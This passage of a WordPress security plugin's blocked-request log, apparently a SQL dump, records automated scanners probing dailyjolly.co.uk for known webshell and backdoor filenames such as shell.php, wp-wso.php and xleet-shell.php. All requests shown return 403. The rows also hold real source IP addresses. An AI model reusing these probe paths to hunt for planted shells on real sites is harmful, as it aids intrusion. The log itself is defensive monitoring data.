Safari\\/537.36\",\"2\":\"www.bing.com\"}','zwTkIxgnBmZMpF7svP9WatU4',0,1673924233.4218,247,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/images/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','uTSCmp7O2a6VfHUAdKZqchWe',0,1673924234.4993,224,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','yVvNd4pkqKsSOxzl5nFo2aHt',0,1673924234.9980,230,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','d8FOPxlnkpX0CTSbUNL3D9J2',0,1673924236.0537,181,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','iCWag0p97jewt3HDXoky14Nl',0,1673924237.1544,219,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','fmN7qxtouI2cyKn1GQO93Upg',0,1673924246.2904,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/archives.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','8tzW10vcExSwO7bmDGiZ9Uu4',0,1673924251.3471,310,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau11.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"www.bing.com\"}','ycFfGW8rHKeNnhQJ4u9EBDzv',0,1673924252.7926,643,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/theme.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.103 Safari\\/537.36\"}','aPeL2IG6Jm8C0QS7Ns9cOyFo',0,1673924733.6130,194107,'','GET',403,0,700,0,1,'',0),('46.21.198.186',773179066,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','UTDM06xFbEOpCh845n2tsyVg',0,1673927413.4016,344,'','GET',403,0,700,0,1,'',0),('185.185.80.221',3115929821,'','https://www.dailyjolly.co.uk/wp-content/plugins/core-stab/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ejwPWTA0SUdOyCa6RQ5uB4po',0,1673927413.5602,203,'','GET',403,0,700,0,1,'',0),('46.21.198.186',773179066,'','https://www.dailyjolly.co.uk/wp-includes/versions.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','ynqS0dlDQZ6485ANhUEHBfxR',0,1673927415.1562,167,'','POST',403,0,700,0,1,'',0),('185.185.80.221',3115929821,'','https://www.dailyjolly.co.uk/wp-includes/versions.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','S9jAObFJIsC8v5oT4dBx2mNf',0,1673927415.3750,193,'','POST',403,0,700,0,1,'',0),('46.21.198.186',773179066,'','https://www.dailyjolly.co.uk/wp-admin/assets/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','aIGjDZeSfLWhbo7HcBk10Kiv',0,1673927415.7218,240,'','GET',403,0,700,0,1,'',0),('185.185.80.221',3115929821,'','https://www.dailyjolly.co.uk/wp-admin/assets/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','i1Inv8p4t3VeJGuMA6BKbSlP',0,1673927415.7774,200,'','GET',403,0,700,0,1,'',0),('46.21.198.186',773179066,'','https://www.dailyjolly.co.uk/wp-content/plugins/walfs/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2YWo09KBQa5gV3PE6hDCFd8v',0,1673927416.6940,202,'','GET',403,0,700,0,1,'',0),('185.185.80.221',3115929821,'','https://www.dailyjolly.co.uk/wp-content/plugins/walfs/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','EH4rIn2GFJh0Aqf6iPcyvKRe',0,1673927416.7574,170,'','GET',403,0,700,0,1,'',0),('46.21.198.186',773179066,'','https://www.dailyjolly.co.uk/wp-includes/fonts/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','jSYoEmRPrN9AIT0OvKXthkW7',0,1673927417.0186,166,'','GET',403,0,700,0,1,'',0),('185.185.80.221',3115929821,'','https://www.dailyjolly.co.uk/wp-includes/fonts/load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','VI0RWweLE3DjGaSx7qXApQKt',0,1673927417.2487,201,'','GET',403,0,700,0,1,'',0),('46.21.198.186',773179066,'','https://www.dailyjolly.co.uk/wp-includes/js/thickbox/themes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','FaO81meox0SA6DUd9wyGlJRg',0,1673927417.3629,169,'','GET',403,0,700,0,1,'',0),('185.185.80.221',3115929821,'','https://www.dailyjolly.co.uk/wp-includes/js/thickbox/themes.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','GkHjPTf6pXyvoAdUKs3wNbcF',0,1673927417.5370,177,'','GET',403,0,700,0,1,'',0),('184.75.221.146',3091979666,'','https://dailyjolly.co.uk/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','buaZz5jgRWSBsrqv6d8wUMHT',0,1673937817.7336,578,'','GET',403,0,700,0,1,'',0),('184.75.221.146',3091979666,'','https://dailyjolly.co.uk/wp-admin/style.php?sig=rename','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 9; Redmi Note 7) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.111 Mobile Safari\\/537.36\"}','PnVIkypC3em8jJiR0H6bsoLM',0,1673937817.7145,604,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/wp-content/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko\\/20100101 Firefox\\/103.0\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\"}','G2VgcCBT4aIdW91p7vew6OQL',0,1673939255.9761,748,'','GET',403,0,700,0,1,'',0),('20.172.244.167',346879143,'','https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko\\/20100101 Firefox\\/107.0\",\"2\":\"http:\\/\\/www.dailyjolly.co.uk\\/\"}','oIz1tK7ybUq3PsjXinCJG0Sc',0,1673939257.3068,858,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/sym.php','','{\"1\":\"python-requests\\/2.28.1\"}','PmJF2C3ySqh1oTY0iAeGRx9B',0,1673949955.1661,331,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/mar.php','','{\"1\":\"python-requests\\/2.28.1\"}','uAdYNVkOb5zw7m0QnPGCpD43',0,1673949955.2294,335,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/radio.php','','{\"1\":\"python-requests\\/2.28.1\"}','BfR9UbaclEuerM0P4v2J7k1p',0,1673949955.3161,324,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/stindex.php','','{\"1\":\"python-requests\\/2.28.1\"}','7xybuclDWAwGBnofZYOMPUH0',0,1673949955.2918,435,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/3.php','','{\"1\":\"python-requests\\/2.28.1\"}','cLMV5ZrECxwgF2Xz8uIan7ST',0,1673949955.6696,803,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','1dmzEHqLRU8D2bkjlMWfisYA',0,1673949955.8265,764,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','q4SZrcAIyj7NeUo9HhF0bu3V',0,1673949955.7314,865,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','yeTnlVd1jDbpRvSQH0Nwas4r',0,1673949955.8191,819,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/stindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','WMdlRYGNI4zeULu5FZVBEq2x',0,1673949956.5225,277,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xZaXN40LwAV9DYjhlc5n2HeW',0,1673949958.1034,397,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/o.php','','{\"1\":\"python-requests\\/2.28.1\"}','u8vWzmhaRGoYSNIdFJZHAKn4',0,1673949961.7829,204,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','YZEdCyWvnHis07cbtoIeLRQf',0,1673949962.2381,227,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"python-requests\\/2.28.1\"}','Wjmva8x7lHNFywuK4LpJXIds',0,1673950007.9590,235,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.28.1\"}','5eAFDUdqxoKEYS46J3QcTuCj',0,1673950008.3822,596,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0y7wWuXtQzAOVRZTBbIKlh5g',0,1673950008.9286,229,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','pAOK07TdDL2Eam4Jjo83N9e6',0,1673950010.5946,456,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/maint/about.php','','{\"1\":\"python-requests\\/2.28.1\"}','dRPOFvrUaZEctX9AkmlsC7HW',0,1673950068.5540,223,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/sym403.php','','{\"1\":\"python-requests\\/2.28.1\"}','e8N1ZV5COpuFPUz0HsGBgdIm',0,1673950068.9236,182,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','EzuDhYfU9nxCtQjHsIA3ToNr',0,1673950069.5404,182,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-admin/maint/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','ukK8YhoTBI4gzaiQ2mr17Dcb',0,1673950069.7365,165,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/s.php','','{\"1\":\"python-requests\\/2.28.1\"}','69vS4Yb8cmVMLlwinqDNzJOA',0,1673950136.6372,224,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0ok9Ibs72T1E3FzXPAJfSUrq',0,1673950138.5759,261,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/0.php','','{\"1\":\"python-requests\\/2.28.1\"}','AnjlBUZow1hCs853mrK9fVQu',0,1673950179.9244,261,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/0byte.php','','{\"1\":\"python-requests\\/2.28.1\"}','iA2GLvTREn30Dh94MopFImCx',0,1673950179.9458,266,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/u.php','','{\"1\":\"python-requests\\/2.28.1\"}','I06415aEyxsfkDQ3SUolYqBz',0,1673950180.5666,191,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','Qm7bNDCei4U0Axn9RWhpruSZ',0,1673950180.8280,177,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/r.php','','{\"1\":\"python-requests\\/2.28.1\"}','jH8AXmgq2PZz6c3iFNGT7ku5',0,1673950181.1000,205,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','RU1YBdsn2b9KToPMepXcqIOV',0,1673950181.5640,205,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-wso.php','','{\"1\":\"python-requests\\/2.28.1\"}','DL9Uh2vNwoZRiYcPMBHu0E6y',0,1673950181.6653,187,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','SaDc6CW0uqlBN3EIzpjyUkwO',0,1673950182.0507,653,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','yKZiFwQCGzLUxnMdpY3uh2kt',0,1673950182.1845,547,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ne.php','','{\"1\":\"python-requests\\/2.28.1\"}','oHX3lf2Q9qZjweDnscTIGCVg',0,1673950182.1887,543,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','EMiAI1cFkfo3KYrG9s8gDQHC',0,1673950182.2079,524,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/ne.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','2OIiFly4oGPUvwBQaSbu7zjc',0,1673950183.4148,242,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/y.php','','{\"1\":\"python-requests\\/2.28.1\"}','RxLyiamD8IJOrnsX3KHf1BTh',0,1673950202.1793,243,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','BS7vlofxi32kZyhDNsnqjPKE',0,1673950203.2073,183,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/wp.php','','{\"1\":\"python-requests\\/2.28.1\"}','YUEMtGrso8lR9TzwPS4jDyuh',0,1673950203.2121,287,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','xrUKmSRkut6TzahH0ni12eVA',0,1673950203.8969,170,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/Uploader.php','','{\"1\":\"python-requests\\/2.28.1\"}','kxrSNnZ9zFj6DuUKtBHYWoAb',0,1673950222.6975,270,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/1975.php','','{\"1\":\"python-requests\\/2.28.1\"}','KDwmt7yEWf8SsnN2JvQVjOcl',0,1673950222.6631,304,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xleet-shell.php','','{\"1\":\"python-requests\\/2.28.1\"}','WnsiCISBMNZdYp91qyRfDVFj',0,1673950222.6988,269,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/1.php','','{\"1\":\"python-requests\\/2.28.1\"}','OAgK7BP219fjzX5nZr3UvVcy',0,1673950222.7293,301,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/2.php','','{\"1\":\"python-requests\\/2.28.1\"}','5txbqM7PwTIpjBzJNHQs96gn',0,1673950222.8394,313,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','g7JG6z5D1UPMAKRO9SBkeWEL',0,1673950223.1118,261,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/1975.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','FuVEiTthZ2PgQNBXcfrjvdak',0,1673950223.2883,199,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/xleet-shell.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','XS1WIKh2B9kRsLxJldTocN37',0,1673950223.5701,209,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"python-requests\\/2.28.1\"}','5xhJSurc6iqbCQ7HRBWw0lmn',0,1673950223.6917,235,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','UJRwp2GqLo8Dj5hAlsvZazSM',0,1673950223.9463,249,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/uploads/2021/12/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','4c2NLYlhPjkOpeu5SdgmXaUF',0,1673950224.1965,170,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','8l9DMBjRCZvyEf1roYnk0aW6',0,1673950224.9907,170,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','dB5iWmCq0Fk6r4NTzSIDM3Up',0,1673950225.3114,185,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/Uploader.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','JU0vprc2LahmFq85P1szRKO3',0,1673950225.3641,212,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/403.php','','{\"1\":\"python-requests\\/2.28.1\"}','ED9wP1sqYfyjKZXrBRLuQWkM',0,1673950235.9025,404,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"python-requests\\/2.28.1\"}','d5VyiMOKmecuxWbrjolNaAJ8',0,1673950235.9921,315,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"python-requests\\/2.28.1\"}','XFUBMNCnfrHz5h9LRpqsKV8J',0,1673950235.9694,338,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','aBNgLvDZo68eu4TsrCnyMblU',0,1673950237.2105,700,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','nHcrvAO6bqkSlyzTLx3Ej7Rf',0,1673950237.4125,555,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','VzkfB9N1mSgLdin7HyQqRCKa',0,1673950237.5168,494,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/i.php','','{\"1\":\"python-requests\\/2.28.1\"}','8zxKahF5UQH70RCj2mXZLwpe',0,1673950265.4440,269,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','0MfpYbumOy1cPHdvXQVeko2F',0,1673950266.3379,241,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"python-requests\\/2.28.1\"}','Gnh3p8rER7QDd9qoZgBcb4SA',0,1673950282.9661,203,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','894KJfSgylAB6OWPdpDrRiuF',0,1673950283.9811,189,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-load.php','','{\"1\":\"python-requests\\/2.28.1\"}','oZ6stCxGnLUh8e4VYAOmgH1K',0,1673950290.2495,210,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/wp-load.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 Safari\\/537.36\"}','oJKPL9nCuG71086N5rcDveUp',0,1673950293.0466,194,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/blog.php','','{\"1\":\"python-requests\\/2.28.1\"}','o7nRLwWH2zvZ43QjMC0xKGEb',0,1673950319.5974,249,'','GET',403,0,700,0,1,'',0),('3.70.167.47',54961967,'','https://dailyjolly.co.uk/blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/108.0.0.0 